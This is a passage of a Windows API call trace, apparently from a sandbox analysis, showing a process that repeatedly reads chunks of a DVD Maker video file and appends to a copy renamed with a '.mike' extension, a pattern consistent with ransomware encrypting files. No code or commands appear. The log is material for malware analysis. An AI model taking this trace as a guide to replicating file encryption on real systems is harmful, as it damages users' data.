Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.790] GetFileType (hFile=0x288) returned 0x1 [0064.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.790] GetFileType (hFile=0x288) returned 0x1 [0064.790] ReadFile (in: hFile=0x288, lpBuffer=0x21b4a74, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21b4a74*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.791] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.791] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.792] GetFileType (hFile=0x288) returned 0x1 [0064.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.792] GetFileType (hFile=0x288) returned 0x1 [0064.792] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x33e220 [0064.796] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.796] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.796] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.796] GetFileType (hFile=0x288) returned 0x1 [0064.796] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.796] GetFileType (hFile=0x288) returned 0x1 [0064.796] ReadFile (in: hFile=0x288, lpBuffer=0x21c1aa4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21c1aa4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.797] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.797] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.797] GetFileType (hFile=0x288) returned 0x1 [0064.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.797] GetFileType (hFile=0x288) returned 0x1 [0064.797] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x340a20 [0064.797] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.798] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.798] GetFileType (hFile=0x288) returned 0x1 [0064.798] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.798] GetFileType (hFile=0x288) returned 0x1 [0064.798] ReadFile (in: hFile=0x288, lpBuffer=0x21cead4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21cead4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.801] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.802] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.802] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.802] GetFileType (hFile=0x288) returned 0x1 [0064.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.802] GetFileType (hFile=0x288) returned 0x1 [0064.802] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x343220 [0064.802] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.802] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.802] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.803] GetFileType (hFile=0x288) returned 0x1 [0064.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.803] GetFileType (hFile=0x288) returned 0x1 [0064.803] ReadFile (in: hFile=0x288, lpBuffer=0x21dbb04, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21dbb04*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.804] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.804] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.804] GetFileType (hFile=0x288) returned 0x1 [0064.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.804] GetFileType (hFile=0x288) returned 0x1 [0064.804] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x345a20 [0064.805] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.805] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.805] GetFileType (hFile=0x288) returned 0x1 [0064.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.805] GetFileType (hFile=0x288) returned 0x1 [0064.805] ReadFile (in: hFile=0x288, lpBuffer=0x21e8b34, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21e8b34*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.806] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.806] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.806] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.806] GetFileType (hFile=0x288) returned 0x1 [0064.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.806] GetFileType (hFile=0x288) returned 0x1 [0064.806] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x348220 [0064.807] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.807] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.807] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.807] GetFileType (hFile=0x288) returned 0x1 [0064.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.807] GetFileType (hFile=0x288) returned 0x1 [0064.807] ReadFile (in: hFile=0x288, lpBuffer=0x21f5b64, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21f5b64*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.808] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.808] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.808] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.808] GetFileType (hFile=0x288) returned 0x1 [0064.808] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.808] GetFileType (hFile=0x288) returned 0x1 [0064.808] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x34aa20 [0064.809] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.809] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.809] GetFileType (hFile=0x288) returned 0x1 [0064.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.809] GetFileType (hFile=0x288) returned 0x1 [0064.809] ReadFile (in: hFile=0x288, lpBuffer=0x2202b94, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2202b94*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.810] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.810] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.810] GetFileType (hFile=0x288) returned 0x1 [0064.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.811] GetFileType (hFile=0x288) returned 0x1 [0064.811] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x34d220 [0064.811] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.811] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.811] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.811] GetFileType (hFile=0x288) returned 0x1 [0064.811] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.811] GetFileType (hFile=0x288) returned 0x1 [0064.811] ReadFile (in: hFile=0x288, lpBuffer=0x220fbc4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x220fbc4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.812] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.812] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.812] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.813] GetFileType (hFile=0x288) returned 0x1 [0064.813] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.813] GetFileType (hFile=0x288) returned 0x1 [0064.813] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x34fa20 [0064.813] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.813] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.813] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.813] GetFileType (hFile=0x288) returned 0x1 [0064.813] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.813] GetFileType (hFile=0x288) returned 0x1 [0064.814] ReadFile (in: hFile=0x288, lpBuffer=0x221cbf4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x221cbf4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.814] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.814] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.815] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.815] GetFileType (hFile=0x288) returned 0x1 [0064.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.815] GetFileType (hFile=0x288) returned 0x1 [0064.815] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x352220 [0064.815] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.815] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.815] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.815] GetFileType (hFile=0x288) returned 0x1 [0064.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.816] GetFileType (hFile=0x288) returned 0x1 [0064.816] ReadFile (in: hFile=0x288, lpBuffer=0x2229c24, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2229c24*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.816] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.817] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.817] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.817] GetFileType (hFile=0x288) returned 0x1 [0064.817] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.817] GetFileType (hFile=0x288) returned 0x1 [0064.817] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x354a20 [0064.817] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.817] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.817] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.818] GetFileType (hFile=0x288) returned 0x1 [0064.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.818] GetFileType (hFile=0x288) returned 0x1 [0064.818] ReadFile (in: hFile=0x288, lpBuffer=0x2236c54, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2236c54*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.819] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.819] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.819] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.819] GetFileType (hFile=0x288) returned 0x1 